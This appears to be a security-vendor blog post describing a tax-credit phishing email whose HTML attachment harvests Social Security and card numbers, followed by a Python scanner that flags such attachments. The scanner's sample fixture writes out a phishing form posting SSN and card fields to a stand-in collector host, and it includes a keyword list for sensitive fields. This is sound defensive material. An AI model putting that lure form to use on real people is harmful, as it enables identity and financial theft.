Who wouldn’t want some tax benefits in the current economic times? Don’t phishers and scammers know that all too well! In a new phishing scheme, Symantec has found that the Child Tax Credit is being used as bait to lure parents into disclosing their financial data. This attack specifically tries to convince users to make claims for credit and lower their tax burden by using their children’s education expenses.
According to the Internal Revenue Service (IRS) website [PDF], taxpayers may be able to reduce their federal income tax by up to $1,000 for each qualifying child. Making use of this information, the spam email discusses the expensive education of children and quickly advises recipients to use this expense to make claims for tax credits under the numerous tax benefits provided by the IRS. It further appeals that, as U.S. citizens or residents, recipients should apply for their tax returns. According to the email, users can get a tax refund of $75,000 for their children’s education. To apply for a refund, users need to complete a form attached to the email message. The fraudulent email has an HTML attachment named “#1924819299.pdf.htm”.
Once the recipient clicks on the attachment, an HTML file will open that asks users to fill in data such as social security numbers, credit/debit card numbers, and related information. Unfortunately, this information is for the fraudsters to use once the user clicks the “submit” button.
Using an HTML attachment in phishing attacks is a well-known technique. The headers and contents of these messages vary constantly in an effort to confuse users. This time the scammers have found a new theme and a new potential target: parents. However, we are continually watching these types of attacks, particularly for any minor variations. This is all the more important because the deadline for filing individual tax returns (April 15, 2010) is not far away, and it won’t be surprising if similar spam campaigns are seen during the next one to two weeks.
Scammers may further attempt to use the huge list of tax benefits as lures to trick users. Symantec advises users to apply standard practices of not opening attachments and/or links from unsolicited emails.
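For mail filtering, the traits described above (an HTML attachment with a document-style double extension that carries a form asking for identity and card data) can be checked mechanically. The following is an added example, not Symantec's detection logic: the keyword list, the reason labels, the remote-post check, and the sample message with its `collector.example` form target are assumptions constructed for illustration.

```python
import re
from email.message import EmailMessage
from html.parser import HTMLParser

# A document extension hidden in front of .htm/.html, as in "#1924819299.pdf.htm".
DECOY_EXT = re.compile(r"\.(pdf|docx?|xlsx?|txt|jpe?g)\.html?$", re.I)
SENSITIVE = re.compile(r"ssn|social|card|cvv|pin|account|routing", re.I)  # assumed keywords

class FormScanner(HTMLParser):  # records form targets and sensitive-looking inputs
    def __init__(self):
        super().__init__()
        self.actions, self.fields = [], []
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.actions.append((attrs.get("action") or "").lower())
        elif tag in ("input", "select", "textarea"):
            name = attrs.get("name") or attrs.get("id") or ""
            if SENSITIVE.search(name):
                self.fields.append(name)

def scan_message(msg):
    """Return one finding per HTML attachment of an email.message.Message."""
    findings = []
    for part in msg.walk():
        fname = part.get_filename() or ""
        if not re.search(r"\.html?$", fname, re.I):
            continue
        scanner = FormScanner()
        scanner.feed((part.get_payload(decode=True) or b"").decode("utf-8", "replace"))
        reasons = []
        if DECOY_EXT.search(fname):
            reasons.append("double-extension")   # name poses as a PDF or other document
        if scanner.fields:
            reasons.append("sensitive-form")     # form asks for identity or payment data
        if any(a.startswith(("http://", "https://")) for a in scanner.actions):
            reasons.append("remote-post")        # local file submits to a remote server
        findings.append({"file": fname, "reasons": reasons, "fields": scanner.fields})
    return findings

def build_sample():
    """Constructed message: one lure-style attachment and one harmless HTML report."""
    lure = (b'<form action="https://collector.example/submit" method="post">'
            b'<input name="ssn"><input name="card_number"><input name="zip"></form>')
    msg = EmailMessage()
    msg.set_content("See attached form.")
    msg.add_attachment(lure, maintype="text", subtype="html", filename="#1924819299.pdf.htm")
    msg.add_attachment(b"<p>Weekly report</p>", maintype="text", subtype="html", filename="report.html")
    return msg
```

Calling `scan_message(build_sample())` flags the first attachment on all three heuristics and returns an empty reason list for the plain report.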